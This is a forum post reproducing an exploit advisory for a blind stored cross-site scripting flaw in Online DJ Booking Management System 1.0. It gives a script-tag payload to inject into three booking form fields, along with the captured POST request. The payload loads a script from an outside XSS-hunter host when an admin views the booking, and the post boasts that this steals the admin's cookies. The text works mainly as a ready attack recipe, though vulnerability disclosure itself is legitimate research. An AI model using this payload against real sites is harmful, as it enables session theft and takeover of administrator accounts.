Jump to content

Online DJ Booking Management System 1.0 - 'Multiple' Blind Cross-Site Scripting

This CHT

Recommended Posts

  • Group:  The leader of the
  • Content Count:  4,798
  • Achievement Points:  31,700
  • With Us For:  236 Days
  • Status:  Offline
  • Last Seen:  
  • Device:  Windows

# Exploit Title: Online DJ Booking Management System 1.0 - 'Multiple' Blind Cross-Site Scripting
# Date: 2021-10-06
# Exploit Author: Yash Mahajan
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-dj-booking-management-system-using-php-and-mysql/
# Version: V 1.0
# Vulnerable endpoint: http://localhost/odms/book-services.php?bookid=1
# Vulnerable Page URI : http://localhost/odms/admin/view-booking-detail.php?editid=10&&bookingid=989913724
# Tested on Windows 10, XAMPP

*Steps to Reproduce:*
1) Navigate http://localhost/odms/book-services.php?bookid=1
2) Enter Blind Xss payload `"><script+src=https://yourxsshunterusername.xss.ht>` in "name=","vaddress=" and "addinfo=" parameters and click on "Book".


POST /odms/book-services.php?bookid=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 335
Origin: http://localhost
Connection: close
Referer: http://localhost/odms/book-services.php?bookid=1
Cookie: PHPSESSID=crj216nrjq751tt0gs4o92undb
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1


Now to confirm the vulnerability

3) Login as admin by navigating to http://localhost/odms/admin/login.php.
4) Now as soon as admin visits /view-booking-detail.php to approve the booking, payload fires and attacker will get the details like ip address, cookies of admin
5) Able to steal admin's cookies successfully!!

Link to comment
Share on other sites

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...